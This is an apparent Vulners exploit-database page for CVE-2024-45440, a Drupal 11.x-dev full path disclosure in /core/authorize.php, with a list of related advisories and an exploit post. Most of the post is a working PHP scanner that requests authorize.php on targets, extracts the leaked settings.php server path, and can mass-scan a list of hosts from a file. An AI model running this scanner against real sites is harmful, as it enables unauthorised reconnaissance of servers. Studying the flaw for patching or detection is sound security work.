| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Exploit for Generation of Error Message Containing Sensitive Information in Drupal | 10 Feb 202616:18 | – | githubexploit | |
| The vulnerability of the /core/authorize.php file in the Drupal CMS system allows a hacker to disclose protected information. | 3 Oct 202400:00 | – | bdu_fstec | |
| CVE-2024-45440 | 29 Aug 202413:42 | – | circl | |
| Drupal 安全漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-45440 | 29 Aug 202400:00 | – | cve | |
| CVE-2024-45440 | 29 Aug 202400:00 | – | cvelist | |
| Drupal 11.x-dev - Full Path Disclosure | 19 Apr 202500:00 | – | exploitdb | |
| Drupal Full Path Disclosure | 29 Aug 202412:31 | – | github | |
| Drupal 11.x-dev - Full Path Disclosure | 15 Jul 202604:32 | – | nuclei | |
| CVE-2024-45440 | 29 Aug 202411:15 | – | nvd |
=============================================================================================================================================
| # Title : Drupal 11.x-dev full Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal/releases/11.x-dev |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190573/ & CVE-2024-45440
[+] Summary :
The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration
attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.
[+] POC :
php poc.php or http://127.0.0.1/poc.php
<?php
/*
* Drupal 11.x-dev Full Path Disclosure
* CVE-2024-45440
* PHP Implementation
*/
class DrupalPathDisclosure {
private $timeout = 10;
private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';
public function scan_single($url) {
echo "[*] Scanning: $url\n";
if (!str_starts_with($url, 'http')) {
$url = 'http://' . $url;
}
$full_url = $url . '/core/authorize.php';
try {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $full_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_USERAGENT => $this->user_agent,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);
if (!empty($matches[1])) {
echo "[+] Vulnerable - Paths disclosed:\n";
foreach ($matches[1] as $path) {
echo " $path\n";
}
return true;
}
}
echo "[-] Not vulnerable\n";
return false;
} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
return false;
}
}
public function scan_multiple($file_path) {
if (!file_exists($file_path)) {
echo "[-] File not found: $file_path\n";
return;
}
$urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$vulnerable = [];
echo "[*] Scanning " . count($urls) . " targets...\n";
foreach ($urls as $url) {
if ($this->scan_single($url)) {
$vulnerable[] = $url;
}
echo "\n";
}
if (!empty($vulnerable)) {
echo "[+] Summary - Vulnerable hosts:\n";
foreach ($vulnerable as $host) {
echo " $host\n";
}
} else {
echo "[-] No vulnerable hosts found\n";
}
}
}
// CLI Interface
if (php_sapi_name() === 'cli') {
$scanner = new DrupalPathDisclosure();
if ($argc < 2) {
echo "Usage:\n";
echo " php drupal_path.php <url> - Scan single target\n";
echo " php drupal_path.php -f <file> - Scan multiple targets from file\n";
echo "\nExamples:\n";
echo " php drupal_path.php example.com\n";
echo " php drupal_path.php -f targets.txt\n";
exit(1);
}
if ($argv[1] === '-f' && isset($argv[2])) {
$scanner->scan_multiple($argv[2]);
} else {
$scanner->scan_single($argv[1]);
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation